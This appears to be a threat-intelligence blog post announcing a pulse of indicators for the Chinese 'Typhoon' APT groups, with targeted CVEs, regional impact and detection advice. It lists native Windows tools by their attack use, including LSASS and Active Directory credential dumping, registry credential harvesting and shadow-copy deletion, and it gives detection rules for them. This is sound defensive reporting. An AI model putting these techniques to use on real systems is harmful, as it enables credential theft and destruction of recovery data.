Chinese APT Typhoon Family: 20 IOCs for Volt, Salt, Flax, and Brass Typhoon

TL;DR: We published an OTX pulse with 20 IOCs covering the Typhoon family of Chinese state-sponsored APTs. Volt Typhoon pre-positions in critical infrastructure. Salt Typhoon intercepts telecom traffic. Taiwan faces 2.4 million cyberattacks daily. Free. No paywall.

The Typhoon Threat

Microsoft's naming convention tells the story: Weather + Country = APT. The Typhoon family represents Chinese state-sponsored groups, and they're among the most sophisticated actors operating today.

The Four Typhoons:

• Volt Typhoon: Critical infrastructure pre-positioning (utilities, communications, transportation)

• Salt Typhoon: Telecom interception (compromised T-Mobile, AT&T, Verizon networks)

• Flax Typhoon: IoT botnet operations (compromised SOHO routers)

• Brass Typhoon: Southeast Asia espionage focus

Taiwan: Ground Zero

Taiwan faces an unprecedented cyber assault:

• 2.4 million cyberattacks daily on government networks

• 150% surge in 2024 compared to 2023

• Critical infrastructure targeting: Power grid, telecommunications, transportation

• Pre-positioning doctrine: Compromise now, activate during crisis

The Taiwan situation isn't just about data theft. It's about pre-positioning access for potential kinetic conflict. Volt Typhoon specifically targets systems that would be critical during military operations.

Salt Typhoon: The Telecom Nightmare

Salt Typhoon's telecom campaign is one of the most significant cyber espionage operations discovered:

• T-Mobile network infrastructure

• AT&T communications systems

• Verizon network components

• Lumen Technologies

• Call detail records (who called whom, when, for how long)

• Text message metadata

• Potentially voice communications

• Lawful intercept systems (wiretap infrastructure)

Why it matters: Accessing lawful intercept systems means they could see who the US government was surveilling. They know which targets were under investigation.

The Living-off-the-Land Doctrine

Volt Typhoon pioneered "living-off-the-land" (LOTL) techniques:

• `ntdsutil.exe` - Active Directory dump

• `wmic.exe` - Shadow copy deletion

• `netsh.exe` - Firewall manipulation

• `reg.exe` - Registry credential harvesting

• `certutil.exe` - File downloads

• `procdump.exe` - LSASS credential dump

• No malware to detect

• No signatures to match

• Native Windows tools

• Blends with normal admin activity

This is why we included YARA patterns in the pulse - detecting the command patterns rather than malware signatures.

The Pulse

Chinese APT Typhoon Family - Volt/Salt/Flax/Brass (Taiwan/Singapore/ASEAN) - DugganUSA

20 IOCs | Subscribe

• 8 C2 IP addresses (confirmed infrastructure)

• 4 CVEs (initial access vectors: Palo Alto, Ivanti, FortiGate)

• 8 YARA patterns (LOTL command detection)

• MITRE ATT&CK mapping (T1190, T1133, T1078, T1003, T1057, T1040)

CVE Arsenal

The Typhoon family exploits edge devices - VPNs, firewalls, and remote access solutions:

CVE-2024-3400 (Palo Alto GlobalProtect) - CVSS: 10.0 - Status: Actively exploited - Volt Typhoon: Primary initial access

CVE-2023-46805 + CVE-2024-21887 (Ivanti Connect Secure) - CVSS: 8.2 + 9.1 - Status: Chained exploitation - All Typhoon variants observed

CVE-2023-27997 (FortiGate SSL-VPN) - CVSS: 9.8 - Status: Actively exploited - Volt Typhoon vector

The pattern: Edge devices are the new perimeter. Compromise the VPN concentrator, and you're inside the network.

Regional Impact

Taiwan - Presidential Office targeted - Ministry of National Defense probed - Critical infrastructure pre-positioned - Academia targeted for tech secrets

Singapore - Government networks targeted - Financial sector reconnaissance - Regional communications hub value

Philippines - South China Sea territorial disputes - Military intelligence targeting - US military base adjacency

ASEAN broadly - Thailand, Indonesia, Malaysia - Diplomatic communications - Economic intelligence

Detection Strategies

Network-level: 1. Monitor for unusual outbound traffic to edge device C2s 2. Watch for LOTL tool execution patterns 3. Detect unusual Active Directory queries 4. Flag credential harvesting command sequences

Endpoint-level: 1. Alert on ntdsutil.exe execution 2. Monitor procdump targeting lsass.exe 3. Detect shadow copy deletion 4. Track registry SAM/SYSTEM extraction

The challenge: These look like admin activities. Context is everything.

The Geopolitical Context

These aren't criminal operations. They're military operations conducted in peacetime.

Pre-positioning doctrine: Chinese military doctrine includes cyber pre-positioning - establishing access to critical infrastructure that can be activated during conflict.

• Ability to disrupt US military logistics in Pacific

• Intelligence on Taiwan defense planning

• Economic intelligence from ASEAN

• Telecom access for ongoing surveillance

What this means: The compromise isn't the objective. The access is the objective.

Resources

• [DugganUSA OTX Profile](https://otx.alienvault.com/user/pduggusa) - All pulses

• [STIX Feed](https://analytics.dugganusa.com/api/v1/stix-feed) - Machine-readable

• [CISA Volt Typhoon Advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a)

• [Microsoft Volt Typhoon Analysis](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/)

*Patrick Duggan is founder of DugganUSA, a Minnesota-based security company. He publishes Typhoon IOCs because (a) Taiwan's 24 million people deserve threat intel too, (b) what hits Taiwan today hits the US tomorrow, and (c) living-off-the-land is genuinely clever tradecraft that deserves documentation.*

*Questions? [email protected]*

The cheapest, fastest, most accurate threat feed on the internet.

275+ enterprises pulling daily. 1M+ IOCs. 17.4M indexed documents. We beat Zscaler by 43 days on NrodeCodeRAT. Starter tier $9/mo — less than any competitor’s sales demo.

Look up an IOC → · Audit your brand on AIPM → · See pricing →